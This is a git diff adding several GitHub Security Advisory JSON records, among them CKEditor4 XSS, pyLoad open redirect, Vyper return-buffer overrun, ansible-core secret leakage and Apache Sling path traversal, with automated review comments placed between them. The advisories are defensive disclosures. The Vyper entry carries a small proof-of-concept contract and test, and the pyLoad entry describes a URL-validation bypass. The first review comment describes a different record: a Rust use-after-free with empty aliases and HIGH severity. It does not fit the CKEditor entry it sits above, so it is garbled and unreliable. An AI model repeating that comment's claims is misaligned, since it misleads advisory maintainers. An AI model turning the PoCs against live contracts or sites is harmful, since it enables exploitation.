diff --git a/advisories/github-reviewed/2024/02/GHSA-fq6h-4g8v-qqvm/GHSA-fq6h-4g8v-qqvm.json b/advisories/github-reviewed/2024/02/GHSA-fq6h-4g8v-qqvm/GHSA-fq6h-4g8v-qqvm.json
new file mode 100644
index 0000000000000..b3c74bbdfbc3d
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-fq6h-4g8v-qqvm/GHSA-fq6h-4g8v-qqvm.json
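Review bot: `aliases` is an empty array even though the record links `RUSTSEC-2018-0020`, which describes the same use-after-free; OSV consumers deduplicate on `aliases`, so `"aliases": ["RUSTSEC-2018-0020"]` would let them merge the two records instead of reporting the bug twice. `severity` is also empty while `database_specific.severity` is `HIGH`, so the rating has no vector behind it; since the details explain that no CVE was sought, a locally assigned vector or an explicit "unscored" state would be clearer than a bare label. The range `1.0.5`–`2.5.0` matches the details, which explain that the iterator-producing function was unusable before 1.0.5.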
@@ -0,0 +1,77 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fq6h-4g8v-qqvm",
+ "modified": "2024-02-07T20:23:50Z",
+ "published": "2024-02-07T17:30:37Z",
+ "aliases": [
+ "CVE-2024-24815"
+ ],
+ "summary": "CKEditor4 Cross-site Scripting vulnerability caused by incorrect CDATA detection",
+ "details": "### Affected packages\nThe vulnerability has been discovered in the core HTML parsing module and may affect all editor instances that:\n* Enabled [full-page editing](https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html) mode,\n* or enabled [CDATA](https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata) elements in [Advanced Content Filtering](https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html) configuration (defaults to `script` and `style` elements).\n\n### Impact\n\nA potential vulnerability has been discovered in CKEditor 4 HTML processing core module. The vulnerability allowed to inject malformed HTML content bypassing Advanced Content Filtering mechanism, which could result in executing JavaScript code. An attacker could abuse faulty CDATA content detection and use it to prepare an intentional attack on the editor. It affects all users using the CKEditor 4 at version < 4.24.0-lts.\n\n### Patches\nThe problem has been recognized and patched. The fix will be available in version 4.24.0-lts.\n\n### For more information\nEmail us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.\n\n### Acknowledgements\nThe CKEditor 4 team would like to thank [Michal Frýba](https://cz.linkedin.com/in/michal-fryba) from [ALEF NULA](https://www.alefnula.com/) for recognizing and reporting this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "ckeditor4"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "4.24.0-lts"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-fq6h-4g8v-qqvm"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24815"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb"
+ },
+ {
+ "type": "WEB",
+ "url": "https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata"
+ },
+ {
+ "type": "WEB",
+ "url": "https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/ckeditor/ckeditor4"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-07T17:30:37Z",
+ "nvd_published_at": "2024-02-07T16:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-g3cm-qg2v-2hj5/GHSA-g3cm-qg2v-2hj5.json b/advisories/github-reviewed/2024/02/GHSA-g3cm-qg2v-2hj5/GHSA-g3cm-qg2v-2hj5.json
new file mode 100644
index 0000000000000..438f705c2fc7c
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-g3cm-qg2v-2hj5/GHSA-g3cm-qg2v-2hj5.json
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3cm-qg2v-2hj5", + "modified": "2024-02-08T16:34:20Z", + "published": "2024-02-05T23:23:22Z", + "aliases": [ + "CVE-2024-24808" + ], + "summary": "pyLoad open redirect vulnerability due to improper validation of the is_safe_url function", + "details": "### Summary\nOpen redirect vulnerability due to incorrect validation of input values when redirecting users after login.\n\n### Details\npyload is validating URLs via the `get_redirect_url` function when redirecting users at login.\n![301715649-f533db41-d0bd-44f7-8735-be1887fbd06c](https://github.com/pyload/pyload/assets/114328108/7fbec2ed-05ed-46e6-847f-05132cf3f136)\n\n\nThe URL entered in the `next` variable goes through the `is_safe_url` function, where a lack of validation can redirect the user to an arbitrary domain.\n![301715667-2819b1d3-8a14-42f4-89c8-3d2fa84fc309](https://github.com/pyload/pyload/assets/114328108/613484f3-8097-4871-887d-8fa5eec817cc)\n\n\nThe documentation in the urllib library shows that improper URLs are recognized as relative paths when using the `urlparse` function. (https://docs.python.org/3/library/urllib.parse.html#urllib.parse.urlparse)\n\nFor example, When an unusual URL like `https:///example.com` is entered, `urlparse` interprets it as a relative path, but in the actual request it is converted to `https://example.com` due to url normalization.\n\n### PoC\n1. In the next variable, insert the URL to which you want to redirect the user.\n![301715949-bb1451eb-5e84-451d-83b4-5c3e204d1df7](https://github.com/pyload/pyload/assets/114328108/6fe639ea-1f85-4715-bf6c-c9c8c4ee9c94)\n\n\n\n2. 
Check that it is possible to bypass url validation and redirect users to an arbitrary url.\n![301715824-3de6584a-878d-4ec4-a3d5-a34d11c6c0ac](https://github.com/pyload/pyload/assets/114328108/902b3244-a4ef-4f8e-8319-c4b92764f15f)\n![301716107-ba5ab7b9-7aa8-4b7a-8924-eba82442b4c3](https://github.com/pyload/pyload/assets/114328108/35191d7b-50b9-4a46-8319-ebdebec20b41)\n\n\n\n### Impact\nAn attacker can use this vulnerability to redirect users to malicious websites, which can be used for phishing and similar attacks.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "pyload-ng" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.5.0b3.dev79" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24808" + }, + { + "type": "WEB", + "url": "https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pyload/pyload" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T23:23:22Z", + "nvd_published_at": "2024-02-06T04:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-g5p6-327m-3fxx/GHSA-g5p6-327m-3fxx.json b/advisories/github-reviewed/2024/02/GHSA-g5p6-327m-3fxx/GHSA-g5p6-327m-3fxx.json new file mode 100644 index 0000000000000..2367fcac56f91 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-g5p6-327m-3fxx/GHSA-g5p6-327m-3fxx.json 
@@ -0,0 +1,76 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g5p6-327m-3fxx", + "modified": "2024-02-02T18:11:06Z", + "published": "2024-02-02T18:11:06Z", + "aliases": [ + + ], + "summary": "Talos Linux ships runc vulnerable to the escape to the host attack", + "details": "### Impact\n\nSnyk has discovered a vulnerability in all versions of runc <=1.1.11, as used by the Docker engine, along with other containerization technologies such as Kubernetes. Exploitation of this issue can result in container escape to the underlying host OS, either through executing a malicious image or building an image using a malicious Dockerfile or upstream image (i.e., when using FROM). This issue has been assigned the CVE-2024-21626.\n\n### Patches\n\n`runc` runtime was updated to 1.1.12 in Talos v1.5.6 and v1.6.4.\n\n### Workarounds\n\nInspect the workloads running on the cluster to make sure they are not trying to exploit the vulnerability.\n\n### References\n\n* [CVE-2024-21626](https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv)\n* [Vulnerability: runc process.cwd and leaked fds container breakout](https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/)\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/siderolabs/talos" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.6.0" + }, + { + "fixed": "1.6.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/siderolabs/talos" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/siderolabs/talos/security/advisories/GHSA-g5p6-327m-3fxx" + }, + { + "type": "PACKAGE", + "url": "https://github.com/siderolabs/talos" + } + ], + 
"database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T18:11:06Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-gfqf-9w98-7jmx/GHSA-gfqf-9w98-7jmx.json b/advisories/github-reviewed/2024/02/GHSA-gfqf-9w98-7jmx/GHSA-gfqf-9w98-7jmx.json new file mode 100644 index 0000000000000..f3823f6af51f4 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-gfqf-9w98-7jmx/GHSA-gfqf-9w98-7jmx.json 
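Review bot: The `references` array of GHSA-g5p6-327m-3fxx lists only the Talos advisory and the package, although the details themselves link the upstream runc advisory that this entry is about; tooling that walks references cannot connect the two. Adding `{ "type": "ADVISORY", "url": "https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv" }` (the URL already quoted in the details) would fix that, and the schema's `related` list is presumably the right place for `CVE-2024-21626` since the empty `aliases` is correct here (the Talos advisory is not the same vulnerability as the runc CVE). The empty `cwe_ids` is likely an omission as well; the runc advisory's classification could be carried over once confirmed.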
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfqf-9w98-7jmx", + "modified": "2024-02-06T18:23:19Z", + "published": "2024-02-06T00:30:28Z", + "aliases": [ + "CVE-2024-24398" + ], + "summary": "Stimulsoft Dashboard.JS directory traversal vulnerability", + "details": "Directory Traversal vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.3 allows a remote attacker to execute arbitrary code via a crafted payload to the fileName parameter of the Save function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "stimulsoft-dashboards-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2024.1.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24398" + }, + { + "type": "WEB", + "url": "https://cloud-trustit.spp.at/s/Pi78FFazHamJQ5R" + }, + { + "type": "WEB", + "url": "https://cves.at/posts/cve-2024-24398/writeup/" + }, + { + "type": "PACKAGE", + "url": "https://github.com/stimulsoft/Dashboards.JS" + }, + { + "type": "WEB", + "url": "http://stimulsoft.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T18:23:19Z", + "nvd_published_at": "2024-02-06T00:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-gfrh-gwqc-63cv/GHSA-gfrh-gwqc-63cv.json b/advisories/github-reviewed/2024/02/GHSA-gfrh-gwqc-63cv/GHSA-gfrh-gwqc-63cv.json new file mode 100644 index 0000000000000..d2835e19514d0 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-gfrh-gwqc-63cv/GHSA-gfrh-gwqc-63cv.json 
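Review bot: `database_specific.cwe_ids` of GHSA-gfqf-9w98-7jmx is empty even though the summary and details describe a directory traversal in the `fileName` parameter, so the entry will be invisible to any CWE-based filtering. The Apache Sling entry added in this same commit uses `"cwe_ids": [ "CWE-22" ]` for a path traversal, and the same value fits here: `"cwe_ids": [ "CWE-22" ]`. The `"http://stimulsoft.com"` WEB reference is a bare vendor homepage over plain HTTP and points at nothing advisory-specific; if a vendor release note or advisory exists it would be the more useful reference, otherwise the entry adds little.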
@@ -0,0 +1,78 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfrh-gwqc-63cv", + "modified": "2024-02-05T20:24:18Z", + "published": "2024-02-05T20:24:18Z", + "aliases": [ + "CVE-2024-24807" + ], + "summary": "Sulu HTML Injection via Autocomplete Suggestion", + "details": "### Impact\n\nIt is an issue when input HTML into the Tag name. The HTML is execute when the tag name is listed in the auto complete form.\nOnly admin users are affected and only admin users can create tags.\n\n### Patches\n\n_Has the problem been patched? What versions should users upgrade to?_\n\nThe problem is patched with Version 2.4.16 and 2.5.12.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nCreate a custom mutation observer\n\n### References\n_Are there any links users can visit to find out more?_\n\nCurrently not.\n\n### For more information\n\n_If you have any questions or comments about this advisory:_\n\n - Open an issue in [sulu/sulu repository](https://github.com/sulu/sulu/issues)\n - Email us at [security@sulu.io](mailto:security@sulu.io)\n", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "sulu/sulu" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.4.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "sulu/sulu" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.5.0" + }, + { + "fixed": "2.5.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sulu/sulu/security/advisories/GHSA-gfrh-gwqc-63cv" + }, + { + "type": "WEB", + "url": "https://github.com/sulu/sulu/commit/570c78124ae97cb02469141b86ac69d9fb2cb147" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sulu/sulu" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79", + "CWE-80" + ], + "severity": "LOW", + "github_reviewed": true, + 
"github_reviewed_at": "2024-02-05T20:24:18Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-gp3w-2v2m-p686/GHSA-gp3w-2v2m-p686.json b/advisories/github-reviewed/2024/02/GHSA-gp3w-2v2m-p686/GHSA-gp3w-2v2m-p686.json new file mode 100644 index 0000000000000..d257bcb5384f4 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-gp3w-2v2m-p686/GHSA-gp3w-2v2m-p686.json 
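Review bot: The `details` string of GHSA-gfrh-gwqc-63cv still contains the GitHub advisory template prompts (`_Has the problem been patched? What versions should users upgrade to?_`, `_Is there a way for users to fix or remediate the vulnerability without upgrading?_`, `_Are there any links users can visit to find out more?_`, `_If you have any questions or comments about this advisory:_`), which read as unanswered questions in the rendered advisory; the prompts should be removed and only the answers kept ("The problem is patched with Version 2.4.16 and 2.5.12.", "Create a custom mutation observer", and the contact links). The `severity` array is empty while `database_specific.severity` is `LOW`; most other new entries in this commit carry a `CVSS_V3` vector alongside the label, so either a vector should be added here or the omission is presumably deliberate for an advisory without a CVSS score. The "Workarounds" text "Create a custom mutation observer" gives no guidance on what the observer should do; a sentence saying what it must strip from the suggestion list would make it actionable.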
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gp3w-2v2m-p686", + "modified": "2024-02-02T18:44:51Z", + "published": "2024-02-02T18:10:10Z", + "aliases": [ + "CVE-2024-24560" + ], + "summary": "Vyper's external calls can overflow return data to return input buffer", + "details": "## Summary\n\nWhen calls to external contracts are made, we write the input buffer starting at byte 28, and allocate the return buffer to start at byte 0 (overlapping with the input buffer). When checking `RETURNDATASIZE` for dynamic types, the size is compared only to the minimum allowed size for that type, and not to the returned value's `length`. As a result, malformed return data can cause the contract to mistake data from the input buffer for returndata.\n\nThis advisory is given a severity of \"Low\" because when the called contract returns invalid ABIv2 encoded data, the calling contract can read different invalid data (from the dirty buffer) than the called contract returned.\n\n## Details\n\nWhen arguments are packed for an external call, we create a buffer of size `max(args, return_data) + 32`. The input buffer is placed in this buffer (starting at byte 28), and the return buffer is allocated to start at byte 0. The assumption is that we can reuse the memory becase we will not be able to read past `RETURNDATASIZE`.\n\n```python\nif fn_type.return_type is not None:\n return_abi_t = calculate_type_for_external_return(fn_type.return_type).abi_type\n\n # we use the same buffer for args and returndata,\n # so allocate enough space here for the returndata too.\n buflen = max(args_abi_t.size_bound(), return_abi_t.size_bound())\nelse:\n buflen = args_abi_t.size_bound()\n\nbuflen += 32 # padding for the method id\n```\n\nWhen data is returned, we unpack the return data by starting at byte 0. 
We check that `RETURNDATASIZE` is greater than the minimum allowed for the returned type:\n```python\nif not call_kwargs.skip_contract_check:\n assertion = IRnode.from_list(\n [\"assert\", [\"ge\", \"returndatasize\", min_return_size]],\n error_msg=\"returndatasize too small\",\n )\n unpacker.append(assertion)\n```\n\nThis check ensures that any dynamic types returned will have a size of at least 64. However, it does not verify that `RETURNDATASIZE` is as large as the `length` word of the dynamic type. \n\nAs a result, if a contract expects a dynamic type to be returned, and the part of the return data that is read as `length` includes a size that is larger than the actual `RETURNDATASIZE`, the return data read from the buffer will overrun the actual return data size and read from the input buffer.\n\n## Proof of Concept\n\nThis contract calls an external contract with two arguments. As the call is made, the buffer includes:\n- byte 28: method_id\n- byte 32: first argument (0)\n- byte 64: second argument (hash)\n\nThe return data buffer begins at byte 0, and will return the returned bytestring, up to a maximum length of 96 bytes.\n\n```python\ninterface Zero:\n def sneaky(a: uint256, b: bytes32) -> Bytes[96]: view\n\n@external\ndef test_sneaky(z: address) -> Bytes[96]:\n return Zero(z).sneaky(0, keccak256(\"oops\"))\n```\nOn the other side, imagine a simple contract that does not, in fact, return a bytestring, but instead returns two uint256s. I've implemented it in Solidity for ease of use with Foundry:\n```solidity\nfunction sneaky(uint a, bytes32 b) external pure returns (uint, uint) {\n return (32, 32);\n}\n```\n\nThe return data will be parsed as a bytestring. The first 32 will point us to byte 32 to read the length. The second 32 will be perceived as the length. 
It will then read the next 32 bytes from the return data buffer, even though those weren't a part of the return data.\n\nSince these bytes will come from byte 64, we can see above that the hash was placed there in the input buffer.\n\nIf we run the following Foundry test, we can see that this does in fact happen:\n```solidity\nfunction test__sneakyZeroReturn() public {\n ZeroReturn z = new ZeroReturn();\n c = SuperContract(deployer.deploy(\"src/loose/\", \"ret_overflow\", \"\"));\n console.logBytes(c.test_sneaky(address(z)));\n}\n```\n\n```md\nLogs:\n 0xd54c03ccbc84dd6002c98c6df5a828e42272fc54b512ca20694392ca89c4d2c6\n```\n\n## Impact\n\nMalicious or mistaken contracts returning the malformed data can result in overrunning the returned data and reading return data from the input buffer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vyper" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.3.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-gp3w-2v2m-p686" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24560" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vyperlang/vyper" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T18:10:10Z", + "nvd_published_at": "2024-02-02T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-h24r-m9qc-pvpg/GHSA-h24r-m9qc-pvpg.json b/advisories/github-reviewed/2024/02/GHSA-h24r-m9qc-pvpg/GHSA-h24r-m9qc-pvpg.json new file mode 100644 index 0000000000000..78186b0fec1b0 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-h24r-m9qc-pvpg/GHSA-h24r-m9qc-pvpg.json 
@@ -0,0 +1,127 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h24r-m9qc-pvpg", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-06T12:30:31Z", + "aliases": [ + "CVE-2024-0690" + ], + "summary": "Ansible-core information disclosure flaw", + "details": "An information disclosure flaw was found in ansible-core due to a failure to respect the `ANSIBLE_NO_LOG` configuration in some scenarios. It was discovered that information is still included in the output in certain tasks, such as loop items. Depending on the task, this issue may include sensitive information, such as decrypted secret values.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ansible-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.16.0b1" + }, + { + "fixed": "2.16.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "ansible-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.15.0b1" + }, + { + "fixed": "2.15.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "ansible-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.14.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0690" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/pull/82565" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/commit/6935c8e303440addd3871ecf8e04bde61080b032" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/commit/78db3a3de6b40fb52d216685ae7cb903c609c3e1" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/commit/b9a03bbf5a63459468baf8895ff74a62e9be4532" + }, + { + "type": "WEB", + "url": 
"https://github.com/ansible/ansible/commit/beb04bc2642c208447c5a936f94310528a1946b1" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0733" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-0690" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259013" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ansible/ansible" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-117" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T20:26:17Z", + "nvd_published_at": "2024-02-06T12:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-h2rq-qhr7-53gm/GHSA-h2rq-qhr7-53gm.json b/advisories/github-reviewed/2024/02/GHSA-h2rq-qhr7-53gm/GHSA-h2rq-qhr7-53gm.json new file mode 100644 index 0000000000000..95f40fdcde102 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-h2rq-qhr7-53gm/GHSA-h2rq-qhr7-53gm.json 
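Review bot: `cwe_ids` of GHSA-h24r-m9qc-pvpg maps the flaw to CWE-117 (Improper Output Neutralization for Logs), which describes log injection, whereas the details describe secret values being emitted in task output despite `ANSIBLE_NO_LOG` — an exposure of sensitive data in logs. CWE-532 (Insertion of Sensitive Information into Log File) is the closer classification, and the entry would be more useful as `"cwe_ids": [ "CWE-532" ]`, subject to the reviewer confirming against the Red Hat advisory linked in the references. The three `affected` ranges (2.16.0b1–2.16.3, 2.15.0b1–2.15.9, 0–2.14.14) look consistent with each other and with the listed backport commits.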
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h2rq-qhr7-53gm", + "modified": "2024-02-06T18:24:31Z", + "published": "2024-02-06T12:30:30Z", + "aliases": [ + "CVE-2024-23673" + ], + "summary": "Apache Sling Servlets Resolver executes malicious code via path traversal", + "details": "\nMalicious code execution via path traversal in Apache Software Foundation Apache Sling Servlets Resolver.This issue affects all version of Apache Sling Servlets Resolver before 2.11.0. However, whether a system is vulnerable to this attack depends on the exact configuration of the system.\nIf the system is vulnerable, a user with write access to the repository might be able to trick the Sling Servlet Resolver to load a previously uploaded script. \n\nUsers are recommended to upgrade to version 2.11.0, which fixes this issue. It is recommended to upgrade, regardless of whether your system configuration currently allows this attack or not.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.sling:org.apache.sling.servlets.resolver" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.11.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23673" + }, + { + "type": "WEB", + "url": "https://github.com/apache/sling-org-apache-sling-servlets-resolver/commit/b54d4e6693e0bcd63a97a0328f4f065b8a81b75e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/sling-org-apache-sling-servlets-resolver" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/5zzx8ztwc6tmbwlw80m2pbrp3913l2kl" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/06/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + 
"github_reviewed_at": "2024-02-06T18:24:31Z", + "nvd_published_at": "2024-02-06T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-h4c3-5275-vrmg/GHSA-h4c3-5275-vrmg.json b/advisories/github-reviewed/2024/02/GHSA-h4c3-5275-vrmg/GHSA-h4c3-5275-vrmg.json new file mode 100644 index 0000000000000..06bf986e1bf40 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-h4c3-5275-vrmg/GHSA-h4c3-5275-vrmg.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h4c3-5275-vrmg", + "modified": "2024-02-03T00:29:02Z", + "published": "2024-02-03T00:29:02Z", + "aliases": [ + + ], + "summary": "Nervos CKB Pool does not remove the conflicting transactions from the statistics ", + "details": "### Impact\n\nThere's a bug in the pool statistics that when conflicting transactions are removed from the pool, they are not subtracted from the statics. Finally, the transaction pool keeps full and reject all transactions.\n\n### Patches\n\n0.39.2\n\n### Workarounds\n\nRestart the CKB node.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.39.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-h4c3-5275-vrmg" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:29:02Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-h84q-m8rr-3v9q/GHSA-h84q-m8rr-3v9q.json b/advisories/github-reviewed/2024/02/GHSA-h84q-m8rr-3v9q/GHSA-h84q-m8rr-3v9q.json new file mode 100644 index 0000000000000..4ac9dbf1de639 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-h84q-m8rr-3v9q/GHSA-h84q-m8rr-3v9q.json 
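Review bot: The `details` string of GHSA-h2rq-qhr7-53gm starts with a stray `\n` and runs two sentences together at `Resolver.This issue affects all version of`, so the rendered advisory opens with a blank line and a missing space; the opening should read `"details": "Malicious code execution via path traversal in Apache Software Foundation Apache Sling Servlets Resolver. This issue affects all versions of Apache Sling Servlets Resolver before 2.11.0. ...`. The text also says vulnerability "depends on the exact configuration of the system" without naming which configuration, which leaves readers unable to tell whether their deployment is exposed; if the Apache thread linked in the references identifies the setting, quoting it in the details would help triage.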
